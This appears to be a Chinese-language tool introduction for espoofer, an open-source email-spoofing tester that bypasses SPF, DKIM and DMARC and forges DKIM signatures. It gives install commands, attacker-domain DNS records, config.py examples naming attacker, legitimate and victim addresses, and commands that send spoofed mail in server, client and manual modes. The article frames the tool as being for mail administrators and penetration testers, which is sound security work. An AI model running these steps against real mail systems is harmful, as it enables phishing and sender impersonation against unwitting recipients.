espoofer是一款功能强大的电子邮件系统安全检测工具,同时它也是一款电子邮件欺骗攻击测试工具。在该工具的帮助下,广大研究人员不仅可以轻松绕过SPF、DKIM和DMARC等与电子邮件安全相关的协议,而且还可以伪造DKIM签名。
除此之外,espoofer也是一个开源的安全测试工具,该工具支持绕过电子邮件系统中的SPF、DKIM和DMARC身份验证机制。值得一提的是,该工具能够帮助邮件服务器管理员和渗透测试人员检查目标电子邮件服务器和客户端是否容易受到电子邮件欺骗攻击,或者是否可能被滥用以发送欺骗电子邮件。
简而言之,espoofer在手,邮件系统安全无忧!
下图显示的是一次针对Gmail邮箱的欺骗攻击:
演示视频:【https://you*tu.be/xuKZpT0rsd0】
首先,我们需要使用下列命令将该项目源码克隆至本地:
git clone https://github.com/chenjj/espoofer
接下来,还需要使用pip3安装好该工具所需的依赖组件:
sudo pip3 install -r requirements.txt
注意:该工具的正常运行要求本地设备安装并配置好Python 3(>=3.7)环境。
epsoofer提供了三种工作模式,服务器模式、客户端模式和手动模式。服务器模式下,epsoofer会以邮件服务器的形式运行;客户端模式下,epsoofer会以邮件客户端的形式运行;手动模式一般用于调试目的。下图显示的是三种模式以及对应的攻击者行为:
如需让epsoofer以服务器模式运行,首先我们要有一个IP地址(1.2.3.4),其输出端口为25,并且没有被ISP屏蔽;其次就是一个域名(attack.com)。
1、域名配置
设置attack.com的DKIM公钥:
selector._domainkey.attacker.com TXT "v=DKIM1; k=rsa; t=y; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNjwdrmp/gcbKLaGQfRZk+LJ6XOWuQXkAOa/lI1En4t4sLuWiKiL6hACqMrsKQ8XfgqN76mmx4CHWn2VqVewFh7QTvshGLywWwrAJZdQ4KTlfR/2EwAlrItndijOfr2tpZRgP0nTY6saktkhQdwrk3U0SZmG7U8L9IPj7ZwPKGvQIDAQAB"
设置attack.com的SPF记录:
attack.com TXT "v=spf1 ip4:1.2.3.4 +all"
2、在config.py中配置工具
config ={
"attacker_site": b"attack.com", # attack.com
"legitimate_site_address": b"[email protected]", # legitimate.com
"victim_address": b"[email protected]", # [email protected]
"case_id": b"server_a1", # server_a1
}
我们可以使用-l参数来查看所有测试的case_id:
python3 espoofer.py -l
3、运行工具并发送一封欺骗邮件
python3 espoofer.py
我们还可以在config.py中修改case_id,或在命令行工具中使用-id选项来测试不同的样例:
python3 espoofer.py -id server_a1
要在客户端模式下运行epsoofer,我们需要在目标电子邮件服务上拥有一个帐户。比如说,下面的例子中[email protected]会尝试伪装成[email protected]进行操作。
1、在config.py文件中配置espoofer
config ={
"legitimate_site_address": b"[email protected]",
"victim_address": b"[email protected]",
"case_id": b"client_a1",
"client_mode": {
"sending_server": ("smtp.gmail.com", 587), # SMTP sending serve ip and port
"username": b"[email protected]", # Your account username and password
"password": b"your_passward_here",
},
}
我们可以使用-l参数来查看所有测试的case_id:
python3 espoofer.py -l
注意:其中的“sending_server”为SMTP发送服务器的地址,而不是接收服务器的地址。
2、运行工具并发送一封欺骗邮件
python3 espoofer.py -m c
我们可以在config.py中修改case_id,并重新运行,或者在命令行中使用-id参数进行修改:
python3 espoofer.py -m c -id client_a1
下面的命令将以手动模式运行espoofer:
python3 espoofer.py -m m -helo attack.com -mfrom <[email protected]> -rcptto <[email protected]> -data raw_msg_here -ip 127.0.0.1 -port 25
https://github.com/chenjj/espoofer
精彩推荐